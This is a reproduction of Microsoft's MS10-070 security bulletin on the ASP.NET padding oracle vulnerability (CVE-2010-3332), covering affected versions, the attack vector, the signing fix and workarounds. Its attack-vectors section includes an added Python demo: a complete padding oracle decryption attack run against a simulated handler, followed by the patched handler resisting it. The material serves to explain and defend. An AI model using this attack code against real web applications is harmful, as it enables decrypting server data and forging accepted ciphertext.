Out Of Band Security Update for ASP.NET

Today, as part of Microsoft’s ongoing commitment to protect its customers with security updates and the latest guidance on the threat landscape, the company is releasing MS10-070 as an out-of-band security update. The update addresses a vulnerability in ASP.NET, as described in Security Advisory 2416728, and carries a maximum severity rating of Important and an Exploitability Index rating of 1 (consistent exploit code likely). As outlined in the advisory, the vulnerability affects the ASP.NET framework on Windows XP, Windows Vista, Windows 7, Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2.

Microsoft recommends that its customers deploy the update as soon as possible to help protect their computers from criminal attacks. Please see the Microsoft Security Response Center (MSRC) blog for more details.

As always, please let us know if you have any questions!

What is the purpose of this alert?

This alert is to provide you with an overview of the new security bulletin being released (out-of-band) on September 28, 2010.

New Security Bulletin Overview

Microsoft is releasing one new security bulletin (out-of-band), MS10-070, for a publicly disclosed vulnerability in ASP.NET.

Note: The affected software summarized in this alert is an abstract. Please see the “Affected Software” section of the bulletin for complete details.

Executive Summary

This security update resolves a publicly disclosed vulnerability in ASP.NET. The vulnerability could allow information disclosure: an attacker who successfully exploited it could read data, such as the view state, that the server had encrypted. The same weakness also allows data tampering, because an attacker who can decrypt the server’s ciphertext can also construct ciphertext that decrypts to content of their choosing. Microsoft .NET Framework versions prior to Microsoft .NET Framework 3.5 Service Pack 1 are not affected by the file content disclosure portion of this vulnerability.

This security update is rated Important for all supported editions of ASP.NET except Microsoft .NET Framework 1.0 Service Pack 3. The security update addresses the vulnerability by additionally signing all data that is encrypted by ASP.NET.

In the following tables of affected and non-affected software, software editions that are not listed are past their support lifecycle. To determine the support lifecycle for your product and edition, visit the Microsoft Support Lifecycle web site at http://support.microsoft.com/lifecycle/.

Bulletin Identifier

Microsoft Security Bulletin MS10-070

Bulletin Title

Vulnerability in ASP.NET Could Allow Information Disclosure (2418042)

Executive Summary

This security update resolves a publicly disclosed vulnerability in ASP.NET. The vulnerability could allow information disclosure: an attacker who successfully exploited it could read data, such as the view state, that the server had encrypted. The same weakness also allows data tampering, because an attacker who can decrypt the server’s ciphertext can also construct ciphertext that decrypts to content of their choosing.

Note that this vulnerability would not allow an attacker to execute code or to elevate privileges directly, but the information it yields could be used in further attacks on the affected system. In Microsoft .NET Framework 3.5 Service Pack 1 and later, the vulnerability can also be used to retrieve the contents of any file within the ASP.NET application, including web.config, which commonly holds connection strings and the application’s machineKey.

The security update addresses the vulnerability by additionally signing all data that ASP.NET encrypts, so that ciphertext an attacker has modified is rejected by the signature check before it is decrypted and the padding check that served as the oracle is never reached.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of ASP.NET except Microsoft .NET Framework 1.0 Service Pack 3.

CVE

CVE-2010-3332 - ASP.NET Padding Oracle Vulnerability

Attack Vectors

To exploit this vulnerability, an attacker would send crafted ciphertext to an affected server in a Web request and determine, from the error code the site returned, whether the ciphertext decrypted to correctly padded data. Each answer reveals whether one guessed byte was right, so with at most 256 requests per byte of plaintext (128 on average) the attacker can decrypt the encrypted data, and by the same method construct ciphertext of their own that the server accepts.
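The attack described above, end to end, together with the effect of the fix described in the executive summary, as an added example: this is Python written for this page, not code from the bulletin, from ASP.NET or from Microsoft. A dependency-free toy Feistel block cipher stands in for the server’s cipher, on the assumption that the attack depends only on CBC mode and PKCS#7 padding and not on the cipher itself. The constructed vulnerable_handle answers 200 or 500 depending on whether the padding check passed, padding_oracle_attack recovers the plaintext from those answers alone, and patched_handle models the update’s approach by verifying an HMAC over the ciphertext before decrypting. All function names, the sample view-state string and the 200/500 status codes are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

BLOCK = 16  # block size in bytes; CBC with PKCS#7 padding, as ASP.NET used

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # round function of the toy cipher: keyed SHA-256, 8 bytes
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    # 4-round Feistel network standing in for AES (assumption: any CBC block cipher will do)
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def unpad(data):  # PKCS#7; raising here is the event the oracle observes
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    n = BLOCK - len(plaintext) % BLOCK
    pt, prev = plaintext + bytes([n]) * n, secrets.token_bytes(BLOCK)  # PKCS#7 pad, random IV
    out = [prev]
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, ct):
    prev, out = ct[:BLOCK], []
    for i in range(BLOCK, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return unpad(b"".join(out))

def vulnerable_handle(key, ct):
    # Constructed model of the pre-MS10-070 server: decrypt first, then let a padding failure show
    try:
        cbc_decrypt(key, ct)
    except ValueError:
        return 500  # padding error surfaces as its own status: the oracle
    return 200

def patched_handle(key, mac_key, token):
    # MS10-070 approach: check an HMAC over the ciphertext before decrypting anything
    ct, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, ct, "sha256").digest(), tag):
        return 500  # one and the same answer for every tampered request
    return vulnerable_handle(key, ct)

def padding_oracle_attack(oracle, ct):
    # Recover the plaintext of ct (IV || blocks) from oracle(ct) -> bool alone
    # (True = padding accepted). At most 256 requests per plaintext byte.
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # block_decrypt(key, target), learned byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            pad_val = BLOCK - pos
            # already-known tail bytes are set so that they decrypt to pad_val
            forged = bytearray([0] * (pos + 1) + [b ^ pad_val for b in inter[pos + 1:]])
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                # last byte only: flip the byte before it to rule out an accidental 02 02 pad
                if pos == BLOCK - 1 and not oracle(
                        bytes(forged[:-2]) + bytes([forged[-2] ^ 0xFF, guess]) + target):
                    continue
                inter[pos] = guess ^ pad_val
                break
            else:
                raise RuntimeError("oracle never accepted: no padding oracle here")
        recovered += _xor(inter, prev)
    return unpad(recovered)

def demo():
    secret = b'<viewstate user="admin" role="sysadmin" />'  # constructed sample plaintext
    key, mac_key = secrets.token_bytes(16), secrets.token_bytes(16)
    ct = cbc_encrypt(key, secret)
    leaked = padding_oracle_attack(lambda c: vulnerable_handle(key, c) == 200, ct)
    token = ct + hmac.new(mac_key, ct, "sha256").digest()  # what the patched server issues
    try:
        padding_oracle_attack(lambda c: patched_handle(key, mac_key, c) == 200, token)
        return leaked, False
    except RuntimeError:  # every request was rejected alike: the oracle is closed
        return leaked, True
```

demo() returns the recovered view state from the vulnerable handler and True for the patched one, meaning the same attack found no request the signed server would accept. Mapping every error to one identical response, as the workaround does, starves padding_oracle_attack of the accept/reject signal in the same way; the signature goes further, because a modified ciphertext is never decrypted at all.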

Mitigating Factors

Microsoft .NET Framework versions prior to Microsoft .NET Framework 3.5 Service Pack 1 are not affected by the file content disclosure portion of this vulnerability.

Workarounds

Enable a UrlScan or Request Filtering rule, enable ASP.NET custom errors, and map all error codes to the same error page, so that a padding failure is indistinguishable from any other error. Because response timing can also serve as the oracle, Microsoft’s published workaround adds a random delay to the error page as well. These measures remove the signal the attack depends on but not the underlying weakness, so the update should still be applied. For specific steps, see the “Workaround” section of the bulletin at the link below.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

MS10-041 and MS09-036 on specific versions of Microsoft .NET Framework on specific operating systems. For specific details, see the “Affected Software” section of the bulletin at the link below.